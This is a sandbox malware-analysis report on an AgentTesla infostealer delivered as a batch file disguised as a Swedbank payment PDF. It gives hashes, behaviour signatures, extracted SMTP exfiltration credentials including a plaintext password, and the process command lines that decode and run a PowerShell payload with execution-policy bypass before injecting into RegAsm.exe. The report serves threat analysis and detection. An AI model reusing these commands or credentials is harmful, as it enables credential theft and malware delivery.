Analysis
- Max time kernel: 147s
- Max time network: 154s
- Platform: windows10-2004_x64
- Resource: win10v2004-20240226-en
- Resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- Submitted: 28-03-2024 01:11
Static task: static1
Behavioral task: behavioral1
- Sample: Maksajuma Kopija_ Swedbank_Pdf.bat
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: Maksajuma Kopija_ Swedbank_Pdf.bat
- Resource: win10v2004-20240226-en
General
- Target: Maksajuma Kopija_ Swedbank_Pdf.bat
- Size: 191KB
- MD5: 235301817498be96c6d65a417cc443c7
- SHA1: 7521769e3b245c2569fb1fa712762fcbdfdf604d
- SHA256: 51f353ec3f19b4fc3acc056ae3dc07247e7b3a212c68149cdb08c7d0c62b4d2d
- SHA512: 94fb845b5fd5ef8d34ed1c8e49ec3670da6ff9bf316bf445745081a62696ccc713d1fa1ae4c325f3647103bc4adf892e5f2fd4eda64075e6dd2ed2d6a2b2ff81
- SSDEEP: 3072:MLP9R7YyEyEAxFAAa37c8eX8Y2y/429sqhKp6ua5u1iCZyNRZU8cLndj:MR7YpAxjWc8eX9/42NhEa50ezcLndj
Malware Config
Extracted
- Protocol: smtp
- Host: mail.aist.lv
- Port: 587
- Username: [email protected]
- Password: WoodIsaev88
Extracted (agenttesla)
- Protocol: smtp
- Host: mail.aist.lv
- Port: 587
- Username: [email protected]
- Password: WoodIsaev88
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow  ioc
    29    api.ipify.org
    30    api.ipify.org
    32    ip-api.com
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description                          pid   process         target process
    PID 2700 set thread context of 2032  2700  powershell.exe  RegAsm.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
    pid   process
    3108  powershell.exe
    3108  powershell.exe
    2700  powershell.exe
    2700  powershell.exe
    2032  RegAsm.exe
    2032  RegAsm.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  3108  powershell.exe
    Token: SeDebugPrivilege  2700  powershell.exe
    Token: SeDebugPrivilege  2032  RegAsm.exe
- Suspicious use of WriteProcessMemory (16 IoCs; identical rows collapsed with a count)
  Processes:
    description                       pid   process         target process  count
    PID 1276 wrote to memory of 3224  1276  cmd.exe         cmd.exe         2
    PID 3224 wrote to memory of 3108  3224  cmd.exe         powershell.exe  3
    PID 3224 wrote to memory of 2700  3224  cmd.exe         powershell.exe  3
    PID 2700 wrote to memory of 2032  2700  powershell.exe  RegAsm.exe      8
Processes (tree depth in brackets)
- [1] C:\Windows\system32\cmd.exe (PID 1276)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Maksajuma Kopija_ Swedbank_Pdf.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe (PID 3224)
    Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Maksajuma Kopija_ Swedbank_Pdf.bat"
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe (PID 3108)
      Command line: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe (PID 2700)
      Command line: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 2032)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\-temp.bat
  Filesize: 191KB
  MD5: 235301817498be96c6d65a417cc443c7
  SHA1: 7521769e3b245c2569fb1fa712762fcbdfdf604d
  SHA256: 51f353ec3f19b4fc3acc056ae3dc07247e7b3a212c68149cdb08c7d0c62b4d2d
  SHA512: 94fb845b5fd5ef8d34ed1c8e49ec3670da6ff9bf316bf445745081a62696ccc713d1fa1ae4c325f3647103bc4adf892e5f2fd4eda64075e6dd2ed2d6a2b2ff81
- C:\Users\Admin\-temp.ps1
  Filesize: 1KB
  MD5: ee6d2d219d1affb98fb9dc1de51d895e
  SHA1: aaa2ceb5f7214c76b8a050a06d257cdc30d6bb48
  SHA256: 017fb2bedc94f0480d208611df6b42589d407fc4338e1f5dc1e00a9fd52752e0
  SHA512: 52139b56af32835b93fb8eb93b553325e36654debe5c15e6b61930ffe8027e0ee5eb0998da4c37ec047c052522a022d7103c33d7495eb1a3504cfee1780229bf
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 1KB
  MD5: 4280e36a29fa31c01e4d8b2ba726a0d8
  SHA1: c485c2c9ce0a99747b18d899b71dfa9a64dabe32
  SHA256: e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
  SHA512: 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 16KB
  MD5: d3b7308e69bb0826a24e611ca6ff784f
  SHA1: e44e0e7b23f35378e333f08af356fa79b10e25fd
  SHA256: ff9502614392a1bf3fc69de442a6b6d097666ece48612ed783f62ea58bc9ca3a
  SHA512: 24dcf879649a071d7893f35297749d217b21851bebd22f0d2435edb251960f975a0b8478961f81fc1e268eca6376621bf70ee0d3d9c30f2e74941ea4d6174772
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i5kolqn1.fpf.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82